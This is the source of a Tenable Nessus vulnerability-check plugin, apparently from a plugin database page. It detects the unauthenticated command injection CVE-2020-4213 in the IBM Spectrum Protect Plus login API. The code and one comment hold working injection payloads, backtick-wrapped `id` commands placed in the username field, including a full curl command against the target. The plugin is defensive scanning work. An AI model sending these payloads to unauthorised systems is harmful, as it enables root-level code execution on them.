Lucene search
This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.IBM_SPP_CVE-2020-4213.NASLHistoryApr 21, 2020 - 12:00 a.m.
IBM Spectrum Protect Plus username Command Injection
2020-04-2100:00:00
This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
31
The IBM Spectrum Protect Plus administrative console running on the remote host is affected by a remote command injection vulnerability due to improper validation of user-supplied data when processing a login HTTP request. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to execute arbitrary code on the system with root privileges.
Note that the application is reportedly affected by other vulnerabilities; however, this plugin has not tested for those issues.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
if (description)
{
script_id(135852);
script_version("1.2");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/23");
script_cve_id("CVE-2020-4213");
script_xref(name:"ZDI", value:"ZDI-20-270");
script_name(english:"IBM Spectrum Protect Plus username Command Injection");
script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a
remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The IBM Spectrum Protect Plus administrative console running on the
remote host is affected by a remote command injection vulnerability
due to improper validation of user-supplied data when processing a
login HTTP request. An unauthenticated, remote attacker can exploit
this, via a specially crafted HTTP request, to execute arbitrary code
on the system with root privileges.
Note that the application is reportedly affected by other
vulnerabilities; however, this plugin has not tested for those issues.");
script_set_attribute(attribute:"see_also", value:"https://www.ibm.com/support/pages/node/3178863");
script_set_attribute(attribute:"solution", value:
"Update the IBM Spectrum Protect Plus RPM package spp-emi to
10.1.5-217 or later. That spp-emi package should be in the IBM
Spectrum Protect Plus 10.1.5 patch1.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-4213");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"vuln_publication_date", value:"2020/02/21");
script_set_attribute(attribute:"patch_publication_date", value:"2020/02/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/04/21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:spectrum_protect_plus");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"General");
script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ibm_spp_admin_console_detect.nbin");
script_require_keys("installed_sw/IBM Spectrum Protect Plus Administrative Console");
script_require_ports("Services/www", 8090);
exit(0);
}
include('http.inc');
include('json.inc');
include('webapp_func.inc');
app = 'IBM Spectrum Protect Plus Administrative Console';
# Exit if app is not detected on the host.
get_install_count(app_name:app, exit_if_zero:TRUE);
# Exit if app is not detected on this www port.
port = get_service(svc:'www', exit_on_fail:TRUE);
get_single_install(app_name:app, port:port);
url = '/emi/api/login';
# To confirm the vulnerability, use the following CURL command:
#
# curl -ki --tlsv1.2 -d 'ltype=product&username=`id>/tmp/id`&password=bar'
# 'https://<target_host>:8090/emi/api/login/'
#
# and check if /tmp/id is created on the target host.
data = 'ltype=product&username=`id`&password=AAAAAAAA';
res = http_send_recv3(
port : port,
method : 'POST',
item : url,
data : data,
content_type : 'application/x-www-form-urlencoded',
exit_on_fail : TRUE
);
if(' 200 ' >!< res[0])
audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected HTTP response status ' + chomp(res[0]));
if(empty_or_null(res[2]))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No HTTP response data');
json = json_read(res[2]);
if(isnull(json[1]))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No JSON data in HTTP response');
authoutput = json[0].authoutput;
if(empty_or_null(authoutput))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No authoutput in HTTP response');
exception = authoutput.exceptionDescription;
if(empty_or_null(exception))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No exceptionDescription in authoutput');
# Patched server uses REST API to perform user login as opposed to
# using the CURL command.
#
# Patched response:
# {"authoutput":{"returnCode":null,"sessionId":null,"exceptionId":null,"exceptionDescription":"org.springframework.web.client.HttpClientErrorException: 401 null","licenseOutput":null}}
if('org.springframework.web.client.HttpClientErrorException' >< exception)
audit(AUDIT_LISTEN_NOT_VULN, app, port);
#
# Vulnerable response:
# {"authoutput":{"returnCode":"0","sessionId":null,"exceptionId":"XSBAuthenticationException","exceptionDescription":"Login has failed due to incorrect user name or password. Try again.","licenseOutput":null}}
else if ('Login has failed due to incorrect user name' >< exception)
{
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(http_last_sent_request()),
output : res[2]
);
}
else
audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected exceptionDescription in authoutput');
| Vendor | Product | Version | CPE |
|---|---|---|---|
| ibm | spectrum_protect_plus | cpe:/a:ibm:spectrum_protect_plus |
Related for IBM_SPP_CVE-2020-4213.NASL